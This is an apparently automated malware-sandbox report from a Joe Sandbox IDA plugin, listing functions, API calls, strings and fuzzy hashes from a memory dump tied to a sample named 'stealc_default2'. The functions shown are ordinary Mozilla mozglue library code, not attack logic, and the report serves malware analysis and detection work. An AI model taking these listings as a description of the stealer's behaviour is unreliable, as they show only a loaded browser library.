API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
String ID:
API String ID: 1881024734-0
Opcode ID: bb0e3c299b45adbad8e51773f30abad58ddb1f74c2ee1d4ba34c899ecdccbdd8
Instruction ID: 66d679fc85a3338a13b26a106b9981f8195db619baaffa00ddadde150c0caf20
Opcode Fuzzy Hash: bb0e3c299b45adbad8e51773f30abad58ddb1f74c2ee1d4ba34c899ecdccbdd8
Instruction Fuzzy Hash: ECC15CB5A09701CFC714DF28C08465ABBF5BF89318F168A5ED9998BB11D730E885CF82

Function 6C108ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 6C0CEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0CEB83

?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6C10B392,?,?,00000001), ref: 6C1091F4

Part of subcall function 6C0FCBE8: GetCurrentProcess.KERNEL32(?,6C0C31A7), ref: 6C0FCBF1
Part of subcall function 6C0FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0C31A7), ref: 6C0FCBFA

Strings

marker-chart, xrefs: 6C10905E
timeline-fileio, xrefs: 6C1090A4
data, xrefs: 6C1090E8
timeline-overview, xrefs: 6C10907A
marker-table, xrefs: 6C10906C
stack-chart, xrefs: 6C1090B2
timeline-ipc, xrefs: 6C109096
name, xrefs: 6C108F16
timeline-memory, xrefs: 6C109088

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
API String ID: 3790164461-3347204862
Opcode ID: dac3fa97ccf6624518feeea69ab7d0101bbde0c54d6a2b16974b8789602e74fe
Instruction ID: 786e408fdb5f7bde73c0716ac95d492e3154240549ec8b4b81391bfbb39cecd1
Opcode Fuzzy Hash: dac3fa97ccf6624518feeea69ab7d0101bbde0c54d6a2b16974b8789602e74fe
Instruction Fuzzy Hash: EDB1E3B0B002099BDB14DF98C8A6BEEBBB5BF85318F104029D515ABF80CB31E945CBD1

Function 6C0EC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0EC5A3
WideCharToMultiByte.KERNEL32 ref: 6C0EC9EA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C0EC9FB
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C0ECA12
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C0ECA2E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0ECAA5

Strings

(null), xrefs: 6C0EC596
0, xrefs: 6C0ED30A

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ByteCharMultiWidestrlen$freemalloc
String ID: (null)$0
API String ID: 4074790623-38302674
Opcode ID: 576204c6ba05a29fab01f22a2c3a848944e2bc3fc8c646c9065328c37fe6606f
Instruction ID: f2c5e59899a8d759e8c03f3e7f24619c3e0160a6818b235ae89bb6757c295bec
Opcode Fuzzy Hash: 576204c6ba05a29fab01f22a2c3a848944e2bc3fc8c646c9065328c37fe6606f
Instruction Fuzzy Hash: A7A1AB306493429FDB00EF28C55475FBBE1EFCA748F04896DE89997641D732E805CB82

Function 6C0EC769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON

Download Yara Rule

APIs

islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C0EC784
_dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C0EC801
_dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C0EC83D
?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0EC891

Strings

INF, xrefs: 6C0EC794
inf, xrefs: 6C0EC78F
nan, xrefs: 6C0EC7A8
NAN, xrefs: 6C0EC7AD

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
String ID: INF$NAN$inf$nan
API String ID: 1991403756-4166689840
Opcode ID: 7ba216c34565d57b4a6901ca508dc2917716a7fcffc14e471bb30cb2704afe9d
Instruction ID: 066fac341b6209cafb9f8e20da00587e10393cbb732ac853715a216cc913d13f
Opcode Fuzzy Hash: 7ba216c34565d57b4a6901ca508dc2917716a7fcffc14e471bb30cb2704afe9d
Instruction Fuzzy Hash: E2516F70A487408FD704AF68C58179EFBF0BF9E308F408A2DE9D5A7650E771D9898B42

Function 6C0C3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0C3492
GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0C34A9
LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0C34EF
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C0C350E
__Init_thread_footer.LIBCMT ref: 6C0C3522
__aulldiv.LIBCMT ref: 6C0C3552
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0C357C
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0C3592

Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6C0C3508
kernel32.dll, xrefs: 6C0C34EA

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 3634367004-706389432
Opcode ID: f293fa49852d511afe591a41cc284d53dc98bd2c142959381c48bf4f44f7f778
Instruction ID: 2ca3924f5bd36023496c020fe02053da152a29cad73ee6c21aeda21e222d3e7e
Opcode Fuzzy Hash: f293fa49852d511afe591a41cc284d53dc98bd2c142959381c48bf4f44f7f778
Instruction Fuzzy Hash: 5B317075F002459BDF04EFB9C848FAE77F9FB4A309F108019E915A3750DA74A906DB61

Function 6C0C4480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(B60B60B8,?,?,?,?,6C104843,?), ref: 6C0C45F5
free.MOZGLUE(?,?,?,?,?,?,?,?,6C104843,?), ref: 6C0C468A
free.MOZGLUE(?,?,?,?,?,?,6C104843,?), ref: 6C0C46C9
free.MOZGLUE(?), ref: 6C0C46EF
free.MOZGLUE(?), ref: 6C0C4712
free.MOZGLUE(?), ref: 6C0C4735
free.MOZGLUE(?), ref: 6C0C4758
free.MOZGLUE(?), ref: 6C0C477B
free.MOZGLUE(?), ref: 6C0C479E

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$moz_xmalloc
String ID:
API String ID: 3009372454-0
Opcode ID: e955ba76911707104f105d5c27395658f1badcc2383822b7dad54810e6bee8fe
Instruction ID: 8676efc88806594bf60c5317c32274561f5473b9ae82c68e0b25efe171e6e134
Opcode Fuzzy Hash: e955ba76911707104f105d5c27395658f1badcc2383822b7dad54810e6bee8fe
Instruction Fuzzy Hash: B9B1EF72B001119FDB188EACC8E077D76F6BF46328F584669E816DBBC6D73099448B83

Function 6C12AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 6C12AC52
CreateFileMappingW.KERNEL32 ref: 6C12AC7D
GetSystemInfo.KERNEL32 ref: 6C12AC98
MapViewOfFile.KERNEL32 ref: 6C12ACB0
GetSystemInfo.KERNEL32 ref: 6C12ACCD
MapViewOfFile.KERNEL32 ref: 6C12AD05
UnmapViewOfFile.KERNEL32 ref: 6C12AD1C
CloseHandle.KERNEL32 ref: 6C12AD28
UnmapViewOfFile.KERNEL32 ref: 6C12AD37
CloseHandle.KERNEL32 ref: 6C12AD43
CloseHandle.KERNEL32 ref: 6C12AD67

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
String ID:
API String ID: 1192971331-0
Opcode ID: fe356a994a67642de4b522e886bfa0cb019fd41c777b2ac17bbd05ec5c950266
Instruction ID: a4ce47392aed821c436f5b604222000164aa9dd15a102ae14992864fc3f75103
Opcode Fuzzy Hash: fe356a994a67642de4b522e886bfa0cb019fd41c777b2ac17bbd05ec5c950266
Instruction Fuzzy Hash: BD3140B1A047058FDB00BF7DD64866EBBF0FF85309F01892DE99997211EB749598CB82

Function 6C0FF2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0FD9DB), ref: 6C0FF2D2
GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6C0FF2F5
moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6C0FF386
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C0FF347

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6C0FF3C8
free.MOZGLUE(00000000,00000000), ref: 6C0FF3F3
free.MOZGLUE(00000000,00000000), ref: 6C0FF3FC
free.MOZGLUE(00000000,?,?,00000000), ref: 6C0FF413

Strings

ntdll.dll, xrefs: 6C0FF2F0

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: freemoz_xmalloc$HandleModule$malloc
String ID: ntdll.dll
API String ID: 301460908-2227199552
Opcode ID: de86ba59d8bd8230d5a33bd9ad1092eaf392ddc119820555a2918354f2ce8fe3
Instruction ID: 562cf8e4d9ff7b9d0ab632293e9eb74535653b9af781401956abf187625cdde2
Opcode Fuzzy Hash: de86ba59d8bd8230d5a33bd9ad1092eaf392ddc119820555a2918354f2ce8fe3
Instruction Fuzzy Hash: 244103B5A043158BDB049F28D84479E77F9EF8531CF25842DDD2AA7B80EB70B486C781

Function 6C126A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C14F618), ref: 6C126A68
GetCurrentProcess.KERNEL32 ref: 6C126A7D
GetCurrentProcess.KERNEL32 ref: 6C126AA1
EnterCriticalSection.KERNEL32(6C14F618), ref: 6C126AAE
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C126AE1
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C126B15
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C126B65
LeaveCriticalSection.KERNEL32(6C14F618,?,?), ref: 6C126B83

Strings

SymInitialize, xrefs: 6C126BA3

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
String ID: SymInitialize
API String ID: 3103739362-3981310019
Opcode ID: d169302dbdc5d2c6b2a87ed3e3c5df54b6062694cb17da8e2efd8b08bc89eb6b
Instruction ID: ce3d37696a5309f5999d57c959e69380ca87ee9889773df13dc41043b6bc851f
Opcode Fuzzy Hash: d169302dbdc5d2c6b2a87ed3e3c5df54b6062694cb17da8e2efd8b08bc89eb6b
Instruction Fuzzy Hash: 0A41AE747053449FDB01EF74C888B9A7BB8EF56308F088079ED58DB282DBB49548CBA1

Function 6C0D9620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C0D9675
__Init_thread_footer.LIBCMT ref: 6C0D9697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C0D96E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C0D9707
__Init_thread_footer.LIBCMT ref: 6C0D971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0D9773

Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1

GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C0D97B7
FreeLibrary.KERNEL32 ref: 6C0D97D0
FreeLibrary.KERNEL32 ref: 6C0D97EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C0D9824

Strings

ntdll.dll, xrefs: 6C0D96E3
MapViewOfFileNuma2, xrefs: 6C0D97B1
NtMapViewOfSection, xrefs: 6C0D9701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C0D9670

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 409848716-3880535382
Opcode ID: 553418dea4ba25f43844b4c67d934a032bd21be06f4570a04142f27bb717f968
Instruction ID: dd9633c4572e673c4e116aeca96fe36019d197a932ac37265620f7c0047ba4f0
Opcode Fuzzy Hash: 553418dea4ba25f43844b4c67d934a032bd21be06f4570a04142f27bb717f968
Instruction Fuzzy Hash: 8441CDB46003019BDF00EFA5D994B8A7BF5EB4931EF018128ED2597740DB34A905DFA1

Function 6C0C1E90 Relevance: 15.1, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0C1EC1
LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C1EE1
EnterCriticalSection.KERNEL32(6C14E744), ref: 6C0C1F38
LeaveCriticalSection.KERNEL32(6C14E744), ref: 6C0C1F5C
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C0C1F83
LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C1FC0
EnterCriticalSection.KERNEL32(6C14E784), ref: 6C0C1FE2
LeaveCriticalSection.KERNEL32(6C14E784), ref: 6C0C1FF6
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0C2019

Strings

MOZ_CRASH(), xrefs: 6C0C2000

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$FreeVirtualmemset
String ID: MOZ_CRASH()
API String ID: 2055633661-2608361144
Opcode ID: 2e7d7707f31402b86ec961066bef34d66f6cbc444bf0bf341dadd5bd64ecfc85
Instruction ID: 36446b6e07dcdb3ddea81b52aaef57f2f050156cdfece69412ba623f9c07e61c
Opcode Fuzzy Hash: 2e7d7707f31402b86ec961066bef34d66f6cbc444bf0bf341dadd5bd64ecfc85
Instruction Fuzzy Hash: CF41E475B053158BDF10EF78C888B6E7AF5EF4935DF008025E914A7741DB7099059BD2

Function 6C125FF0 Relevance: 15.1, APIs: 10, Instructions: 76COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6C126009
??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C126024
?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(6C0CEE51,?), ref: 6C126046
OutputDebugStringA.KERNEL32(?,6C0CEE51,?), ref: 6C126061
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C126069
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C126073
_dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C126082
_fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C14148E), ref: 6C126091
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,6C0CEE51,00000000,?), ref: 6C1260BA
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C1260C4

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
String ID:
API String ID: 3835517998-0
Opcode ID: 9d79c1ccf792101da3006f8e1dffd56bbf98cd37b152e54cb6a0ccb4600938bd
Instruction ID: 202aa5eb5c78b5670a9c70a3c7c36b170eb1514f4f837f7548b756cc187070ad
Opcode Fuzzy Hash: 9d79c1ccf792101da3006f8e1dffd56bbf98cd37b152e54cb6a0ccb4600938bd
Instruction Fuzzy Hash: 0D21D671A002089FDB106F24DC08B9E7BB8FF45218F10C468E81E97280DB74A559CFD1

Function 6C110000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C110039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C110041
GetCurrentThreadId.KERNEL32 ref: 6C110075
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C110082
moz_xmalloc.MOZGLUE(00000048), ref: 6C110090
free.MOZGLUE(?), ref: 6C110104
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C11011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6C11005B

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: a0eacb3df5d43129bfdb0b7307803d8c22db180d2a2804d7bcab2a4f605da99a
Instruction ID: ac494e19818dbf22b42f6dd493b4ac60c8f920caf97df1bc6a1849f8d035c569
Opcode Fuzzy Hash: a0eacb3df5d43129bfdb0b7307803d8c22db180d2a2804d7bcab2a4f605da99a
Instruction Fuzzy Hash: 3F418EB5A047449FCB10DF64C840A9ABBF0FF4A328F44852DE96A97B40DB35F815CB91

Function 6C0D7E90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 116stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0D7EA7
malloc.MOZGLUE(00000001), ref: 6C0D7EB3

Part of subcall function 6C0DCAB0: EnterCriticalSection.KERNEL32(?), ref: 6C0DCB49
Part of subcall function 6C0DCAB0: LeaveCriticalSection.KERNEL32(?), ref: 6C0DCBB6

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,00000000), ref: 6C0D7EC4
mozalloc_abort.MOZGLUE(?), ref: 6C0D7F19
malloc.MOZGLUE(?), ref: 6C0D7F36
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C0D7F4D

Strings

d, xrefs: 6C0D7F89

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSectionmalloc$EnterLeavememcpymozalloc_abortstrlenstrncpy
String ID: d
API String ID: 204725295-2564639436
Opcode ID: 83c1d1e1c5d97c870879ef564acf5b58a10425c951bdcfb1933cc04c263fdf95
Instruction ID: b0c073b307d915ed83a73a163432686fe83a9a3bbed5a9d5ce1b63213856ccc2
Opcode Fuzzy Hash: 83c1d1e1c5d97c870879ef564acf5b58a10425c951bdcfb1933cc04c263fdf95
Instruction Fuzzy Hash: 1531F861E0035897DB00EB68DC04AFEB7B8EF9520CF459628ED4957612FB70B6C8C391

Function 6C0D3E80 Relevance: 13.7, APIs: 9, Instructions: 246memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,?,?,?,?,?,6C0D3CCC), ref: 6C0D3EEE
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C0D3FDC
RtlAllocateHeap.NTDLL(?,00000000,00000040,?,?,?,?,?,6C0D3CCC), ref: 6C0D4006
RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C0D40A1
RtlFreeUnicodeString.NTDLL(?,?,00000000,?,?,00000000,?,?,?,?,?,?,6C0D3CCC), ref: 6C0D40AF
